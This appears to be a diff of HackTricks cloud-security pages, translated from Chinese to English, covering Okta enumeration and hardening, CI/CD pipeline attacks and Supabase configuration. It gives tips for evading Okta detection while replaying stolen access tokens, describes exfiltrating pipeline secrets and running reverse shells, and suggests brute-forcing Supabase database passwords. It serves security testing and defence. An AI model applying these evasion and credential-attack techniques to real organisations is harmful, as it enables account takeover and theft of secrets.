The best way to find out if you could impersonate anyone on each app would be to try it!
## 规避行为检测策略 <a href="#id-9fde" id="id-9fde"></a>
## Evading behavioural detection policies <a href="#id-9fde" id="id-9fde"></a>
Okta 中的行为检测策略可能在遇到之前是未知的,但 **绕过** 它们可以通过 **直接针对 Okta 应用程序** 来实现,避免主要的 Okta 仪表板。使用 **Okta 访问令牌**,在 **特定应用程序的 Okta URL** 上重放令牌,而不是主登录页面。
Behavioral detection policies in Okta might be unknown until encountered, but **bypassing** them can be achieved by **targeting Okta applications directly**, avoiding the main Okta dashboard. With an **Okta access token**, replay the token at the **application-specific Okta URL** instead of the main login page.
关键建议包括:
Key recommendations include:
- **避免使用** 流行的匿名代理和 VPN 服务来重放捕获的访问令牌。
- 确保 **客户端和重放访问令牌之间的一致用户代理字符串**
- **避免从同一 IP 地址重放** 来自不同用户的令牌。
- 在重放令牌时对 Okta 仪表板要小心。
- 如果知道受害公司 IP 地址,**限制流量** 到这些 IP 或其范围,阻止所有其他流量。
- **Avoid using** popular anonymizer proxies and VPN services when replaying captured access tokens.
- Ensure **consistent user-agent strings** between the client and replayed access tokens.
- **Refrain from replaying** tokens from different users from the same IP address.
- Exercise caution when replaying tokens against the Okta dashboard.
- If aware of the victim company's IP addresses, **restrict traffic** to those IPs or their range, blocking all other traffic.
## Okta 加固
## Okta Hardening
Okta 有很多可能的配置,在此页面中您将找到如何审查它们以确保尽可能安全:
Okta has a lot of possible configurations, in this page you will find how to review them so they are as secure as possible:
{{#ref}}
okta-hardening.md
{{#endref}}
## 参考
## References
- [https://trustedsec.com/blog/okta-for-red-teamers](https://trustedsec.com/blog/okta-for-red-teamers)
- [https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -2,198 +2,201 @@
{{#include ../../banners/hacktricks-training.md}}
## 目录
## Directory
### 人员
### People
从攻击者的角度来看,这非常有趣,因为您将能够看到**所有注册的用户**、他们的**电子邮件**地址、他们所属的**组**、**个人资料**,甚至**设备**(手机及其操作系统)。
From an attackers perspective, this is super interesting as you will be able to see **all the users registered**, their **email** addresses, the **groups** they are part of, **profiles** and even **devices** (mobiles along with their OSs).
对于白盒审查,请检查是否没有多个“**待处理用户操作**”和“**密码重置**”。
For a whitebox review check that there aren't several "**Pending user action**" and "**Password reset**".
###
### Groups
这是您可以找到在 Okta 中创建的所有组的地方。了解不同的组(**权限**集合)对**用户**的授予是很有趣的。\
可以查看**包含在组中的人员**和**分配给每个组的应用程序**。
This is where you find all the created groups in Okta. it's interesting to understand the different groups (set of **permissions**) that could be granted to **users**.\
It's possible to see the **people included inside groups** and **apps assigned** to each group.
当然,任何名为**admin**的组都是有趣的,特别是**全球管理员**组,检查成员以了解谁是特权成员。
Ofc, any group with the name of **admin** is interesting, specially the group **Global Administrators,** check the members to learn who are the most privileged members.
从白盒审查来看,**全球管理员不应超过 5 个**(最好只有 2 或 3 个)。
From a whitebox review, there **shouldn't be more than 5 global admins** (better if there are only 2 or 3).
### 设备
### Devices
在这里找到**所有用户的设备列表**。您还可以查看它是否被**主动管理**。
Find here a **list of all the devices** of all the users. You can also see if it's being **actively managed** or not.
### 个人资料编辑器
### Profile Editor
在这里可以观察到关键的个人信息,如名字、姓氏、电子邮件、用户名等是如何在 Okta 和其他应用程序之间共享的。这很有趣,因为如果用户可以在 Okta 中**修改某个字段**(例如他的名字或电子邮件),而该字段又被**外部应用程序**用来**识别**用户,那么内部人员可能会尝试**接管其他账户**。
Here is possible to observe how key information such as first names, last names, emails, usernames... are shared between Okta and other applications. This is interesting because if a user can **modify in Okta a field** (such as his name or email) that then is used by an **external application** to **identify** the user, an insider could try to **take over other accounts**.
此外,在 Okta 的个人资料**`User (default)`**中,您可以看到每个**用户**具有**哪些字段**以及哪些字段是**可写的**。如果您无法看到管理面板,只需转到**更新您的个人资料**信息,您将看到可以更新的字段(请注意,要更新电子邮件地址,您需要验证它)。
Moreover, in the profile **`User (default)`** from Okta you can see **which fields** each **user** has and which ones are **writable** by users. If you cannot see the admin panel, just go to **update your profile** information and you will see which fields you can update (note that to update an email address you will need to verify it).
### 目录集成
### Directory Integrations
目录允许您从现有来源导入人员。我想在这里您将看到从其他目录导入的用户。
Directories allow you to import people from existing sources. I guess here you will see the users imported from other directories.
我还没有看到,但我想这很有趣,可以找出**Okta 用于导入用户的其他目录**,因此如果您**妥协该目录**,您可以在 Okta 中创建的用户中设置一些属性值,并**可能妥协 Okta 环境**。
I haven't seen it, but I guess this is interesting to find out **other directories that Okta is using to import users** so if you **compromise that directory** you could set some attributes values in the users created in Okta and **maybe compromise the Okta env**.
### 个人资料来源
### Profile Sources
个人资料来源是**作为用户个人资料属性的真实来源的应用程序**。用户一次只能由一个应用程序或目录提供。
A profile source is an **application that acts as a source of truth** for user profile attributes. A user can only be sourced by a single application or directory at a time.
我还没有看到,所以关于此选项的安全和黑客信息将不胜感激。
I haven't seen it, so any information about security and hacking regarding this option is appreciated.
## 自定义
## Customizations
### 品牌
### Brands
在此部分的**域**选项卡中检查用于发送电子邮件的电子邮件地址和公司在 Okta 中的自定义域(您可能已经知道)。
Check in the **Domains** tab of this section the email addresses used to send emails and the custom domain inside Okta of the company (which you probably already know).
此外,在**设置**选项卡中,如果您是管理员,您可以“**使用自定义注销页面**”并设置自定义 URL
Moreover, in the **Setting** tab, if you are admin, you can "**Use a custom sign-out page**" and set a custom URL.
### 短信
### SMS
这里没有什么有趣的内容。
Nothing interesting here.
### 最终用户仪表板
### End-User Dashboard
您可以在这里找到配置的应用程序,但我们将在不同的部分稍后查看这些详细信息。
You can find here applications configured, but we will see the details of those later in a different section.
### 其他
### Other
有趣的设置,但从安全角度来看没有什么特别有趣的。
Interesting setting, but nothing super interesting from a security point of view.
## 应用程序
## Applications
### 应用程序
### Applications
在这里,您可以找到所有**配置的应用程序**及其详细信息谁可以访问它们如何配置SAML、OpenID、登录 URL、Okta 和应用程序之间的映射...
Here you can find all the **configured applications** and their details: Who has access to them, how is it configured (SAML, OPenID), URL to login, the mappings between Okta and the application...
在**`登录`**选项卡中,还有一个名为**`密码显示`**的字段,允许用户在检查应用程序设置时**显示他的密码**。要从用户面板检查应用程序的设置,请单击 3 个点:
In the **`Sign On`** tab there is also a field called **`Password reveal`** that would allow a user to **reveal his password** when checking the application settings. To check the settings of an application from the User Panel, click the 3 dots:
<figure><img src="../../images/image (283).png" alt=""><figcaption></figcaption></figure>
您可以看到有关该应用程序的更多详细信息(例如密码显示功能,如果已启用):
And you could see some more details about the app (like the password reveal feature, if it's enabled):
<figure><img src="../../images/image (220).png" alt=""><figcaption></figcaption></figure>
## 身份治理
## Identity Governance
### 访问认证
### Access Certifications
使用访问认证创建审计活动,以定期审查用户对资源的访问,并在需要时自动批准或撤销访问。
Use Access Certifications to create audit campaigns to review your users' access to resources periodically and approve or revoke access automatically when required.
我还没有看到它被使用,但我想从防御的角度来看,这是一个不错的功能。
I haven't seen it used, but I guess that from a defensive point of view it's a nice feature.
## 安全
## Security
### 一般
### General
- **安全通知电子邮件**:所有应启用。
- **CAPTCHA 集成**:建议至少设置不可见的 reCaptcha
- **组织安全**所有内容都可以启用激活电子邮件不应持续太长时间7 天是可以的)。
- **用户枚举防止**:两者都应启用。
- 请注意,如果允许以下任一条件,则用户枚举防止将无效(有关更多信息,请参见 [用户管理](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm)
- 自助注册
- 带电子邮件身份验证的 JIT 流程
- **Okta ThreatInsight 设置**:根据威胁级别记录和执行安全性。
- **Security notification emails**: All should be enabled.
- **CAPTCHA integration**: It's recommended to set at least the invisible reCaptcha
- **Organization Security**: Everything can be enabled and activation emails shouldn't last long (7 days is ok)
- **User enumeration prevention**: Both should be enabled
- Note that User Enumeration Prevention doesn't take effect if either of the following conditions are allowed (See [User management](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) for more information):
- Self-Service Registration
- JIT flows with email authentication
- **Okta ThreatInsight settings**: Log and enforce security based on threat level
### HealthInsight
在这里可以找到正确和**危险**配置的**设置**。
Here is possible to find correctly and **dangerous** configured **settings**.
### 认证器
### Authenticators
在这里您可以找到用户可以使用的所有身份验证方法密码、电话、电子邮件、代码、WebAuthn... 单击密码认证器,您可以查看**密码策略**。请检查它是否强大。
Here you can find all the authentication methods that a user could use: Password, phone, email, code, WebAuthn... Clicking in the Password authenticator you can see the **password policy**. Check that it's strong.
在**注册**选项卡中,您可以查看哪些是必需的或可选的:
In the **Enrollment** tab you can see how the ones that are required or optinal:
<figure><img src="../../images/image (143).png" alt=""><figcaption></figcaption></figure>
建议禁用电话。最强的组合可能是密码、电子邮件和 WebAuthn 的组合。
It's recommendatble to disable Phone. The strongest ones are probably a combination of password, email and WebAuthn.
### 身份验证策略
### Authentication policies
每个应用程序都有一个身份验证策略。身份验证策略验证尝试登录应用程序的用户是否满足特定条件,并根据这些条件强制执行因素要求。
Every app has an authentication policy. The authentication policy verifies that users who try to sign in to the app meet specific conditions, and it enforces factor requirements based on those conditions.
在这里,您可以找到**访问每个应用程序的要求**。建议每个应用程序至少请求密码和另一种方法。但是,如果作为攻击者您发现某些东西更弱,您可能能够攻击它。
Here you can find the **requirements to access each application**. It's recommended to request at least password and another method for each application. But if as attacker you find something more weak you might be able to attack it.
### 全球会话策略
### Global Session Policy
在这里,您可以找到分配给不同组的会话策略。例如:
Here you can find the session policies assigned to different groups. For example:
<figure><img src="../../images/image (245).png" alt=""><figcaption></figcaption></figure>
建议请求 MFA将会话生命周期限制为几个小时不要在浏览器扩展中持久化会话 cookie并限制位置和身份提供者如果可能的话。例如如果每个用户应该从一个国家登录您可以只允许该位置。
It's recommended to request MFA, limit the session lifetime to some hours, don't persis session cookies across browser extensions and limit the location and Identity Provider (if this is possible). For example, if every user should be login from a country you could only allow this location.
### 身份提供者
### Identity Providers
身份提供者IdP是**管理用户账户**的服务。在 Okta 中添加 IdP 使您的最终用户能够通过首先使用社交账户或智能卡进行身份验证来**自助注册**您的自定义应用程序。
Identity Providers (IdPs) are services that **manage user accounts**. Adding IdPs in Okta enables your end users to **self-register** with your custom applications by first authenticating with a social account or a smart card.
在身份提供者页面上您可以添加社交登录IdP并通过添加入站 SAML 将 Okta 配置为服务提供者SP。添加 IdP 后,您可以设置路由规则,根据上下文(例如用户的位置、设备或电子邮件域)将用户定向到 IdP。
On the Identity Providers page, you can add social logins (IdPs) and configure Okta as a service provider (SP) by adding inbound SAML. After you've added IdPs, you can set up routing rules to direct users to an IdP based on context, such as the user's location, device, or email domain.
**如果配置了任何身份提供者**,从攻击者和防御者的角度检查该配置,并**确保来源确实可信**,因为攻击者妥协它也可能获得对 Okta 环境的访问。
**If any identity provider is configured** from an attackers and defender point of view check that configuration and **if the source is really trustable** as an attacker compromising it could also get access to the Okta environment.
### 委派身份验证
### Delegated Authentication
委派身份验证允许用户通过输入其组织的**Active Directory (AD) LDAP**服务器的凭据登录 Okta。
Delegated authentication allows users to sign in to Okta by entering credentials for their organization's **Active Directory (AD) or LDAP** server.
再次检查这一点,因为攻击者妥协组织的 AD 可能能够通过此设置转向 Okta。
Again, recheck this, as an attacker compromising an organizations AD could be able to pivot to Okta thanks to this setting.
### 网络
### Network
网络区域是一个可配置的边界,您可以使用它来**授予或限制对您组织中计算机和设备的访问**,基于请求访问的**IP 地址**。您可以通过指定一个或多个单独的 IP 地址、IP 地址范围或地理位置来定义网络区域。
A network zone is a configurable boundary that you can use to **grant or restrict access to computers and devices** in your organization based on the **IP address** that is requesting access. You can define a network zone by specifying one or more individual IP addresses, ranges of IP addresses, or geographic locations.
定义一个或多个网络区域后,您可以在全球会话策略、**身份验证策略**、VPN 通知和**路由规则**中使用它们。
After you define one or more network zones, you can **use them in Global Session Policies**, **authentication policies**, VPN notifications, and **routing rules**.
从攻击者的角度来看,了解哪些 IP 被允许(并检查是否有任何**IP 更特权**)是很有趣的。从攻击者的角度来看,如果用户应该从特定的 IP 地址或区域访问,请检查此功能是否正确使用。
From an attackers perspective it's interesting to know which Ps are allowed (and check if any **IPs are more privileged** than others). From an attackers perspective, if the users should be accessing from an specific IP address or region check that this feature is used properly.
### 设备集成
### Device Integrations
- **端点管理**:端点管理是可以应用于身份验证策略的条件,以确保受管理的设备可以访问应用程序。
- 我还没有看到这被使用。待办事项
- **通知服务**:我还没有看到这被使用。待办事项
- **Endpoint Management**: Endpoint management is a condition that can be applied in an authentication policy to ensure that managed devices have access to an application.
- I haven't seen this used yet. TODO
- **Notification services**: I haven't seen this used yet. TODO
### API
您可以在此页面创建 Okta API 令牌,并查看已**创建**的令牌、它们的**权限**、**过期**时间和**来源 URL**。请注意API 令牌是以创建令牌的用户的权限生成的,仅在创建它们的**用户**处于**活动**状态时有效。
You can create Okta API tokens in this page, and see the ones that have been **created**, theirs **privileges**, **expiration** time and **Origin URLs**. Note that an API tokens are generated with the permissions of the user that created the token and are valid only if the **user** who created them is **active**.
**受信任的来源**授予您控制和信任的网站访问您的 Okta 组织,通过 Okta API
The **Trusted Origins** grant access to websites that you control and trust to access your Okta org through the Okta API.
不应有很多 API 令牌,因为如果有,攻击者可能会尝试访问它们并使用它们。
There shuoldn't be a lot of API tokens, as if there are an attacker could try to access them and use them.
## 工作流
## Workflow
### 自动化
### Automations
自动化允许您创建基于在最终用户生命周期中发生的一组触发条件运行的自动化操作。
Automations allow you to create automated actions that run based on a set of trigger conditions that occur during the lifecycle of end users.
例如一个条件可以是“Okta 中的用户不活动”或“Okta 中的用户密码过期”,而操作可以是“向用户发送电子邮件”或“在 Okta 中更改用户生命周期状态”。
For example a condition could be "User inactivity in Okta" or "User password expiration in Okta" and the action could be "Send email to the user" or "Change user lifecycle state in Okta".
## 报告
## Reports
### 报告
### Reports
下载日志。它们会**发送**到当前账户的**电子邮件地址**。
Download logs. They are **sent** to the **email address** of the current account.
### 系统日志
### System Log
在这里,您可以找到**用户执行的操作日志**,包含许多详细信息,如在 Okta 或通过 Okta 登录的应用程序。
Here you can find the **logs of the actions performed by users** with a lot of details like login in Okta or in applications through Okta.
### 导入监控
### Import Monitoring
这可以**从其他平台导入日志**,通过 Okta 访问。
This can **import logs from the other platforms** accessed with Okta.
### 速率限制
### Rate limits
检查达到的 API 速率限制。
Check the API rate limits reached.
## 设置
## Settings
### 账户
### Account
在这里,您可以找到有关 Okta 环境的**通用信息**,例如公司名称、地址、**电子邮件账单联系人**、**电子邮件技术联系人**,以及谁应该接收 Okta 更新和哪种类型的 Okta 更新。
Here you can find **generic information** about the Okta environment, such as the company name, address, **email billing contact**, **email technical contact** and also who should receive Okta updates and which kind of Okta updates.
### 下载
### Downloads
在这里,您可以下载 Okta 代理,以将 Okta 与其他技术同步。
Here you can download Okta agents to sync Okta with other technologies.
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -6,7 +6,7 @@
## VCS
VCS **版本控制系统 (Version Control System)**,该系统允许开发者**管理他们的源代码**。最常见的是 **git**,你通常会在以下**平台**中看到公司使用它:
VCS stands for **Version Control System**, this systems allows developers to **manage their source code**. The most common one is **git** and you will usually find companies using it in one of the following **platforms**:
- Github
- Gitlab
@@ -18,93 +18,86 @@ VCS 是 **版本控制系统 (Version Control System)**,该系统允许开发
## CI/CD Pipelines
CI/CD pipelines 使开发者能够**自动执行代码**以完成多种目的,包括构建、测试和部署应用。这些自动化工作流由特定的操作触发,例如 code pushespull requests 或计划任务。它们有助于简化从开发到生产的流程。
CI/CD pipelines enable developers to **automate the execution of code** for various purposes, including building, testing, and deploying applications. These automated workflows are **triggered by specific actions**, such as code pushes, pull requests, or scheduled tasks. They are useful for streamlining the process from development to production.
但是,这些系统需要在某处**执行**,并且通常需要**有特权的凭证来部署代码或访问敏感信息**。
However, these systems need to be **executed somewhere** and usually with **privileged credentials to deploy code or access sensitive information**.
## VCS Pentesting Methodology
> [!NOTE]
> 即便一些 VCS platforms 允许为此部分创建 pipelines我们在本节中只分析对源代码控制的潜在攻击。
> Even if some VCS platforms allow to create pipelines for this section we are going to analyze only potential attacks to the control of the source code.
托管项目源代码的平台包含敏感信息,因此必须非常小心在该平台内授予的权限。以下是攻击者可能滥用的一些常见问题:
Platforms that contains the source code of your project contains sensitive information and people need to be very careful with the permissions granted inside this platform. These are some common problems across VCS platforms that attacker could abuse:
- **Leaks**: 如果你的代码在提交中包含 leaks且攻击者可以访问 repo因为它是 public 或者他已有访问权限),他可能会发现这些 leaks
- **Access**: 如果攻击者能**访问 VCS platform 内的一个账户**,他可能会获得**更多的可见性和权限**。
- **Register**: 一些平台允许外部用户直接创建账户。
- **SSO**: 有些平台不允许直接注册,但允许任何拥有有效 SSO 的人访问(例如攻击者可以用他的 github 账户登录)。
- **Credentials**: Username+Pwd, personal tokens, ssh keys, Oauth tokens, cookies... 有多种类型的令牌可以被窃取,从而以某种方式访问 repo
- **Webhooks**: VCS platforms 允许生成 webhooks。如果这些 webhooks **未用不可见的 secret 保护****攻击者可能会滥用它们**。
- 如果没有 secret,攻击者可能滥用第三方平台的 webhook。
- 如果 secret 在 URL 中,同样会发生并且攻击者也会拥有该 secret。
- **Code compromise:** 如果恶意行为者对仓库拥有某种**写入**权限,他可能尝试**注入恶意代码**。要成功,他可能需要**绕过 branch protections**。这些操作可以出于不同目的:
- 攻破 main branch 以**影响 production**。
- 攻破 main或其他分支以**感染开发者的机器**因为他们通常在机器上运行测试、terraform 或其他在 repo 内的任务)。
- **Compromise the pipeline**(见下一节)
- **Leaks**: If your code contains leaks in the commits and the attacker can access the repo (because it's public or because he has access), he could discover the leaks.
- **Access**: If an attacker can **access to an account inside the VCS platform** he could gain **more visibility and permissions**.
- **Register**: Some platforms will just allow external users to create an account.
- **SSO**: Some platforms won't allow users to register, but will allow anyone to access with a valid SSO (so an attacker could use his github account to enter for example).
- **Credentials**: Username+Pwd, personal tokens, ssh keys, Oauth tokens, cookies... there are several kind of tokens a user could steal to access in some way a repo.
- **Webhooks**: VCS platforms allow to generate webhooks. If they are **not protected** with non visible secrets an **attacker could abuse them**.
- If no secret is in place, the attacker could abuse the webhook of the third party platform
- If the secret is in the URL, the same happens and the attacker also have the secret
- **Code compromise:** If a malicious actor has some kind of **write** access over the repos, he could try to **inject malicious code**. In order to be successful he might need to **bypass branch protections**. These actions can be performed with different goals in mid:
- Compromise the main branch to **compromise production**.
- Compromise the main (or other branches) to **compromise developers machines** (as they usually execute test, terraform or other things inside the repo in their machines).
- **Compromise the pipeline** (check next section)
## Pipelines Pentesting Methodology
定义 pipeline 最常见的方式,是使用**托管在仓库中的 CI 配置文件**来描述。该文件说明执行作业的顺序、影响流程的条件以及构建环境设置。\
这些文件通常有统一的名称和格式,例如 — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI),以及位于 .github/workflows 下的 GitHub Actions YAML 文件。当触发时pipeline 作业会**从选定源(例如 commit / branch拉取代码**,并**针对该代码运行 CI 配置文件中指定的命令**。
The most common way to define a pipeline, is by using a **CI configuration file hosted in the repository** the pipeline builds. This file describes the order of executed jobs, conditions that affect the flow, and build environment settings.\
These files typically have a consistent name and format, for example — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), and the GitHub Actions YAML files located under .github/workflows. When triggered, the pipeline job **pulls the code** from the selected source (e.g. commit / branch), and **runs the commands specified in the CI configuration file** against that code.
因此,攻击者的最终目标是以某种方式**篡改这些配置文件**或它们**执行的命令**。
> [!TIP]
> 一些托管的 builder 允许贡献者选择 Docker build context 和 Dockerfile 路径。如果 context 可被攻击者控制,你可以将其设置到仓库外(例如 "..")以在构建期间读取主机文件并外泄 secrets。参见
>
>{{#ref}}
>docker-build-context-abuse.md
>{{#endref}}
Therefore the ultimate goal of the attacker is to somehow **compromise those configuration files** or the **commands they execute**.
### PPE - Poisoned Pipeline Execution
Poisoned Pipeline Execution (PPE) 路径利用 SCM 仓库中的权限来操纵 CI pipeline 并执行有害命令。拥有必要权限的用户可以修改 CI 配置文件或 pipeline 作业使用的其他文件以包含恶意命令。这会“污染”CI pipeline导致这些恶意命令被执行。
The Poisoned Pipeline Execution (PPE) path exploits permissions in an SCM repository to manipulate a CI pipeline and execute harmful commands. Users with the necessary permissions can modify CI configuration files or other files used by the pipeline job to include malicious commands. This "poisons" the CI pipeline, leading to the execution of these malicious commands.
要成功执行 PPE 攻击,恶意行为者需要能够:
For a malicious actor to be successful performing a PPE attack he needs to be able to:
- 拥有对 VCS platform 的**写入访问**,因为通常 pipeline 在 push pull request 时被触发。(查看 VCS pentesting methodology 了解获取访问权限的汇总方式)。
- 注意有时**外部 PR 也会被视为“写入访问”**。
- 即便他有写入权限,他也需要确保能**修改 CI 配置文件或配置所依赖的其他文件**。
- 为此,他可能需要能够**绕过 branch protections**。
- Have **write access to the VCS platform**, as usually pipelines are triggered when a push or a pull request is performed. (Check the VCS pentesting methodology for a summary of ways to get access).
- Note that sometimes an **external PR count as "write access"**.
- Even if he has write permissions, he needs to be sure he can **modify the CI config file or other files the config is relying on**.
- For this, he might need to be able to **bypass branch protections**.
PPE 有 3 种变体:
There are 3 PPE flavours:
- **D-PPE**: **Direct PPE** 发生在攻击者直接**修改将被执行的 CI 配置**文件时。
- **I-DDE**: **Indirect PPE** 发生在攻击者**修改 CI 配置所依赖的文件**(例如 make 文件或 terraform 配置)时。
- **Public PPE or 3PE**: 在某些情况下pipelines 可以被**没有仓库写入权限的用户触发**(这些用户可能甚至不是组织成员),因为他们可以发送 PR
- **3PE Command Injection**: 通常,CI/CD pipelines 会用**关于 PR 的信息设置环境变量**。如果该值可被攻击者控制(例如 PR 的标题)且被**用于危险的地方**(比如执行 sh 命令),攻击者可能在其中**注入命令**。
- **D-PPE**: A **Direct PPE** attack occurs when the actor **modifies the CI config** file that is going to be executed.
- **I-DDE**: An **Indirect PPE** attack occurs when the actor **modifies** a **file** the CI config file that is going to be executed **relays on** (like a make file or a terraform config).
- **Public PPE or 3PE**: In some cases the pipelines can be **triggered by users that doesn't have write access in the repo** (and that might not even be part of the org) because they can send a PR.
- **3PE Command Injection**: Usually, CI/CD pipelines will **set environment variables** with **information about the PR**. If that value can be controlled by an attacker (like the title of the PR) and is **used** in a **dangerous place** (like executing **sh commands**), an attacker might **inject commands in there**.
### Exploitation Benefits
了解了三种污染 pipeline 的方式后,我们来看攻击者成功利用后可能获得的收益:
Knowing the 3 flavours to poison a pipeline, lets check what an attacker could obtain after a successful exploitation:
- **Secrets**: 如前所述pipeline 的作业需要获取特权(检索代码、构建、部署等),这些特权通常以 **secrets** 的形式存在。这些 secrets 通常可以通过 **env 变量或系统内的文件**访问。因此攻击者会尽可能外泄大量 secrets。
- 根据 pipeline 平台的不同,攻击者**可能需要在配置中指定 secrets**。这意味着如果攻击者不能修改 CI 配置 pipeline(例如 I-PPE),他**只能外泄该 pipeline 所具有的 secrets**。
- **Computation**: 代码在某处被执行,取决于执行位置,攻击者可能进一步横向移动。
- **On-Premises**: 如果 pipelines 在本地执行,攻击者可能进入**内部网络并访问更多资源**。
- **Cloud**: 攻击者可能访问云中的其他机器,也可能**外泄 IAM roles/service accounts 的 tokens**以获取云内的进一步访问。
- **Platforms machine**: 有时作业会在 **pipelines platform 的机器**内执行,这些机器通常位于云中且没有更多权限。
- **Select it:** 有时 **pipelines platform 配置了多种机器**,如果你能**修改 CI 配置文件**,你可以**指定要在哪台机器上运行恶意代码**。在这种情况下,攻击者可能会在每台可用机器上运行反向 shell 以尝试进一步利用。
- **Compromise production**: 如果你在 pipeline 内部并且最终版本就是从这里构建和部署的,你可以**篡改将在生产中运行的代码**。
- **Secrets**: As it was mentioned previously, pipelines require **privileges** for their jobs (retrieve the code, build it, deploy it...) and this privileges are usually **granted in secrets**. These secrets are usually accessible via **env variables or files inside the system**. Therefore an attacker will always try to exfiltrate as much secrets as possible.
- Depending on the pipeline platform the attacker **might need to specify the secrets in the config**. This means that is the attacker cannot modify the CI configuration pipeline (**I-PPE** for example), he could **only exfiltrate the secrets that pipeline has**.
- **Computation**: The code is executed somewhere, depending on where is executed an attacker might be able to pivot further.
- **On-Premises**: If the pipelines are executed on premises, an attacker might end in an **internal network with access to more resources**.
- **Cloud**: The attacker could access **other machines in the cloud** but also could **exfiltrate** IAM roles/service accounts **tokens** from it to obtain **further access inside the cloud**.
- **Platforms machine**: Sometimes the jobs will be execute inside the **pipelines platform machines**, which usually are inside a cloud with **no more access**.
- **Select it:** Sometimes the **pipelines platform will have configured several machines** and if you can **modify the CI configuration file** you can **indicate where you want to run the malicious code**. In this situation, an attacker will probably run a reverse shell on each possible machine to try to exploit it further.
- **Compromise production**: If you ware inside the pipeline and the final version is built and deployed from it, you could **compromise the code that is going to end running in production**.
## More relevant info
### Tools & CIS Benchmark
- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) 是一个开源工具,用于基于新的 [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf) 对你的软件供应链堆栈进行安全合规审计。审计关注整个 SDLC 过程,可以揭示从代码阶段到部署阶段的风险。
- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) is an open-source tool for auditing your software supply chain stack for security compliance based on a new [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). The auditing focuses on the entire SDLC process, where it can reveal risks from code time into deploy time.
### Top 10 CI/CD Security Risk
查看 Cider 关于前十个 CI/CD 风险的有趣文章: [**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/)
Check this interesting article about the top 10 CI/CD risks according to Cider: [**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/)
### Labs
- 在每个平台的本地运行示例中,你会找到如何在本地启动它的说明,以便你可以按需配置来测试。
- On each platform that you can run locally you will find how to launch it locally so you can configure it as you want to test it
- Gitea + Jenkins lab: [https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat)
### Automatic Tools
- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** 是一个针对基础设施即代码的静态代码分析工具。
- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** is a static code analysis tool for infrastructure-as-code.
## References

File diff suppressed because it is too large Load Diff

View File

@@ -1,49 +1,50 @@
# Supabase 安全
# Supabase Security
{{#include ../banners/hacktricks-training.md}}
## 基本信息
## Basic Information
根据他们的 [**官网首页**](https://supabase.com/)Supabase 是一个开源的 Firebase 替代品。使用 Postgres 数据库、Authenticationinstant APIsEdge FunctionsRealtime subscriptionsStorage Vector embeddings 启动你的项目。
As per their [**landing page**](https://supabase.com/): Supabase is an open source Firebase alternative. Start your project with a Postgres database, Authentication, instant APIs, Edge Functions, Realtime subscriptions, Storage, and Vector embeddings.
### 子域名
### Subdomain
基本上,当创建项目时,用户会收到一个 supabase.co 子域名,例如:**`jnanozjdybtpqgcwhdiz.supabase.co`**
Basically when a project is created, the user will receive a supabase.co subdomain like: **`jnanozjdybtpqgcwhdiz.supabase.co`**
## **数据库配置**
## **Database configuration**
> [!TIP]
> **这些数据可以通过类似 `https://supabase.com/dashboard/project/<project-id>/settings/database` 的链接访问**
> **This data can be accessed from a link like `https://supabase.com/dashboard/project/<project-id>/settings/database`**
这个 **数据库** 会部署在某个 AWS 区域,要连接它可以使用:`postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres`(此示例在 us-west-1 创建)。\
该密码是用户之前设置的。
This **database** will be deployed in some AWS region, and in order to connect to it it would be possible to do so connecting to: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (this was crated in us-west-1).\
The password is a **password the user put** previously.
因此,由于子域名是已知的,并且它被用作用户名且 AWS 区域有限,可能可以尝试 **brute force the password**
Therefore, as the subdomain is a known one and it's used as username and the AWS regions are limited, it might be possible to try to **brute force the password**.
本节还包含以下选项:
This section also contains options to:
- 重置数据库密码
- 配置连接池
- 配置 SSL拒绝明文连接默认启用
- 配置磁盘大小
- 应用网络限制和封禁
- Reset the database password
- Configure connection pooling
- Configure SSL: Reject plan-text connections (by default they are enabled)
- Configure Disk size
- Apply network restrictions and bans
## API 配置
## API Configuration
> [!TIP]
> **这些数据可以通过类似 `https://supabase.com/dashboard/project/<project-id>/settings/api` 的链接访问**
> **This data can be accessed from a link like `https://supabase.com/dashboard/project/<project-id>/settings/api`**
访问项目中 supabase API 的 URL 类似于:`https://jnanozjdybtpqgcwhdiz.supabase.co`
The URL to access the supabase API in your project is going to be like: `https://jnanozjdybtpqgcwhdiz.supabase.co`.
### anon API 密钥
### anon api keys
它还会生成一个 **anon API key** (`role: "anon"`),例如:`eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk`,应用需要使用该 key 来访问 API示例中暴露的内容如下。
